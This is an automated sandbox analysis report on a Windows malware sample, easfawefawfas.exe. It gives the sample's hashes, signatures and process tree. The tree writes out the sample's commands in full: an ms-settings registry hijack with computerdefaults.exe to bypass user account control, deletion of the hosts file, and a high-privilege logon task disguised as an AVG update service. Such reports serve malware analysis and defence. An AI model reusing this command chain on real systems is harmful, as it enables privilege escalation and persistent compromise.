Analysis
-
max time kernel
145s -
max time network
114s -
platform
windows11-21h2_x64 -
resource
win11-20240419-en -
resource tags
arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system -
submitted
30-05-2024 21:50
Static task
static1
Behavioral task
behavioral1
Sample
easfawefawfas.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
easfawefawfas.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
easfawefawfas.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral4
Sample
easfawefawfas.exe
Resource
win11-20240419-en
General
-
Target
easfawefawfas.exe
-
Size
12KB
-
MD5
2813b6e3ed4bd6b14c53e3dffcdff21d
-
SHA1
5ac7c7a3dadde70f94810c608a2eb275f14b7bde
-
SHA256
866c0294731f195b0b9efa4f9b7cac352e8de5121f63a458a75efed3a625d24a
-
SHA512
ff2454992a5fbe5c8cfab149ebd5edaa089ab4f25b88a47c5da0348575a72f1de372c8e762f74f284070a7a2e1209202ca755b4c08dd99799ac5bb9a598e0a24
-
SSDEEP
192:LsNqFnJvOXdub8t6QP+TXVKTl1hAKje2Ecp0Gun8JZcxZQF:LsNvuI6QIKTHhA8rt0nnicxo
Malware Config
Signatures
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry class 7 IoCs
Processes:
reg.exereg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" reg.exe Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\ms-settings\shell\open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\ms-settings\shell reg.exe Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\ms-settings\shell\open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\ms-settings\shell\open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\consoleitaly1826.vbs" reg.exe Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\ms-settings\shell\open\command reg.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
easfawefawfas.exedescription pid process Token: SeDebugPrivilege 3468 easfawefawfas.exe -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
easfawefawfas.execmd.exeComputerDefaults.exewscript.execmd.exedescription pid process target process PID 3468 wrote to memory of 4820 3468 easfawefawfas.exe reg.exe PID 3468 wrote to memory of 4820 3468 easfawefawfas.exe reg.exe PID 3468 wrote to memory of 4820 3468 easfawefawfas.exe reg.exe PID 3468 wrote to memory of 2704 3468 easfawefawfas.exe reg.exe PID 3468 wrote to memory of 2704 3468 easfawefawfas.exe reg.exe PID 3468 wrote to memory of 2704 3468 easfawefawfas.exe reg.exe PID 3468 wrote to memory of 1008 3468 easfawefawfas.exe cmd.exe PID 3468 wrote to memory of 1008 3468 easfawefawfas.exe cmd.exe PID 3468 wrote to memory of 1008 3468 easfawefawfas.exe cmd.exe PID 1008 wrote to memory of 1460 1008 cmd.exe ComputerDefaults.exe PID 1008 wrote to memory of 1460 1008 cmd.exe ComputerDefaults.exe PID 1008 wrote to memory of 1460 1008 cmd.exe ComputerDefaults.exe PID 1460 wrote to memory of 1916 1460 ComputerDefaults.exe wscript.exe PID 1460 wrote to memory of 1916 1460 ComputerDefaults.exe wscript.exe PID 1460 wrote to memory of 1916 1460 ComputerDefaults.exe wscript.exe PID 3468 wrote to memory of 5056 3468 easfawefawfas.exe cmd.exe PID 3468 wrote to memory of 5056 3468 easfawefawfas.exe cmd.exe PID 3468 wrote to memory of 5056 3468 easfawefawfas.exe cmd.exe PID 1916 wrote to memory of 2288 1916 wscript.exe cmd.exe PID 1916 wrote to memory of 2288 1916 wscript.exe cmd.exe PID 1916 wrote to memory of 2288 1916 wscript.exe cmd.exe PID 5056 wrote to memory of 4176 5056 cmd.exe schtasks.exe PID 5056 wrote to memory of 4176 5056 cmd.exe schtasks.exe PID 5056 wrote to memory of 4176 5056 cmd.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\easfawefawfas.exe"C:\Users\Admin\AppData\Local\Temp\easfawefawfas.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3468 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\consoleitaly1826.vbs" /f2⤵
- Modifies registry class
PID:4820 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /d "0" /f2⤵
- Modifies registry class
PID:2704 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C computerdefaults.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1008 -
C:\Windows\SysWOW64\ComputerDefaults.execomputerdefaults.exe3⤵
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Windows\SysWOW64\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\consoleitaly1826.vbs4⤵
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts5⤵PID:2288
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /SC ONLOGON /TN AVGUpdateService_gKwwuP9Gdga87vtVr050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\gKwwuP9Gdga87vtVr050MX.exe" /RL HIGHEST /IT2⤵
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /SC ONLOGON /TN AVGUpdateService_gKwwuP9Gdga87vtVr050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\gKwwuP9Gdga87vtVr050MX.exe" /RL HIGHEST /IT3⤵
- Creates scheduled task(s)
PID:4176
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
171B
MD5a34267102c21aff46aecc85598924544
SHA177268af47c6a4b9c6be7f7487b2c9b233d49d435
SHA256eba7ab5c248e46dbe70470b41ebf25a378b4eff9ce632adff927ac1f95583d44
SHA5125d320312b93b46c9051a20c82d6405a3f2c78b23adb3ab3e71aad854b65b500937de7ca2986cf79967386d689beecccf676d89afde8ecc5d5ad0cb4ae2bf38a3